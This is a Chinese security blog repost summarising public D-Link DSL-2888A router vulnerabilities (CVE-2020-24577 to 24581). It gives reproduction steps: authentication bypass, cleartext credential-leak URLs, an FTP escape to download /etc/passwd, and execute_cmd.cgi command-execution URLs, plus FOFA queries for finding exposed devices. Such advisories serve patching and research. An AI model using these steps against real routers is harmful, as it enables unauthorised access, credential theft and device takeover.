DSL-2888A漏洞总结

admin 2024年11月8日16:15:58评论27 views字数 1969阅读6分33秒阅读模式

D-link DSL-2888A是中国D-link公司的一款统一服务路由器。

CVE-2020-24579(未授权访问 )

漏洞描述

路由器 Web 门户的身份验证不足,允许访问任何经过身份验证的管理页面,而无需拥有正确的密码。位于同一网络上的恶意用户可以使用无效凭据直接浏览到任何经过身份验证的管理页面。

漏洞编号

  • CVE-2020-24579

影响版本

  • AU_2.31_V1.1.47ae55之前版本

FOFA指纹

body="DSL-2888A"

漏洞复现

  1. 浏览路由器网页界面:http://192.168.1.1/

  2. 提交任何字符串作为密码

DSL-2888A漏洞总结

  1. 应用程序将通知用户密码无效,但实现了有效的访问会话

DSL-2888A漏洞总结

  1. 浏览到任何经过身份验证的页面。例如:/WiFi.shtml。

DSL-2888A漏洞总结

DSL-2888A漏洞总结

CVE-2020-24577(信息泄漏)

漏洞描述

恶意用户通过物理连接或无线接入与网络建立连接后,可以通过直接浏览以下网址获取明文的互联网提供商连接用户名和密码,以及明文的无线路由器登录用户名和密码:

漏洞编号

  • CVE-2020-24577

影响版本

  • AU_2.31_V1.1.47ae55之前版本

漏洞复现

  • http://DeviceIP:8008/tmp/cfg/lib_cfg_cfgcmd

  • http://DeviceIP:8008/tmp/.nvram

DSL-2888A漏洞总结

CVE-2020-24578(FTP 配置错误)

漏洞描述

D-Link DSL-2888A 路由器具有文件共享功能,允许用户通过将外部驱动器插入路由器来与其他网络用户共享文件。然后通过 FTP(文件传输协议)共享。但是,FTP 服务允许网络用户转义共享文件夹以访问路由器文件系统并下载位于根文件夹中的其他文件。

漏洞编号

  • CVE-2020-24578

影响版本

  • AU_2.31_V1.1.47ae55之前版本

漏洞复现

前提为使用 D-Link DSL-28881A 信息泄露 CVE-2020-24577 获取FTP凭证

下载“passwd”的示例:

  1. 在 FTP 客户端上使用以下命令连接到具有有效凭据的 FTP 服务(从 Finding-2 中获得)。
    ftp <DeviceIP>

  2. 使用以下命令导航到根文件夹。
    ftp>cd /

  3. 使用以下命令下载密码哈希文件。
    ftp>cd etc/
    ftp>get passwd

DSL-2888A漏洞总结

CVE-2020-24581(远程命令执行)

漏洞描述

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。
在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行

CVE-2020-24580(不正确的身份验证)

路由器使用连接用户的源IP地址进行认证。这允许恶意用户通过将合法用户的 IP 地址更改为管理员用户的 IP 地址来“欺骗”具有有效会话的合法用户的 IP 地址,从而浏览任何经过身份验证的管理网页。

漏洞编号

  • CVE-2020-24581

FOFA指纹

body="DSL-2888A" && server=="uhttpd"

影响版本

  • AU_2.31_V1.1.47ae55之前版本

固件下载

  • https://www.dlink.com.sg/dsl-2888a

漏洞复现

  • http://DeviceIP/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=ls

DSL-2888A漏洞总结

  • http://DeviceIP/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id

DSL-2888A漏洞总结

DSL-2888A漏洞总结

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(巢安实验室):DSL-2888A漏洞总结

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月8日16:15:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DSL-2888A漏洞总结https://cn-sec.com/archives/1792754.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息